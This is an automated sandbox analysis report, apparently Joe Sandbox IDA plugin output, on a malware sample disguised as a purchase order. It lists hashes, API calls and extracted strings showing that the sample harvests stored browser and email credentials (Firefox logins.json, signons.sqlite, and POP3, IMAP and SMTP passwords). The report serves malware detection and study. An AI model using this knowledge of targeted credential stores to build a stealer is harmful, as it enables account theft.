                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                      APIs
                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumNamesResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334572018-0
                                                                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                      • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                      • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,75B4EB20,?,00000000), ref: 00402533
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                      • API String ID: 168965057-606283353
                                                                                                      • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                      • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2998058495-0
                                                                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                      • API String ID: 231171946-2189169393
                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 633282248-1996832678
                                                                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                      • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                      • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                      APIs
                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                      • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                      • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                      • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                      • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                      • String ID: salu
                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                      • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
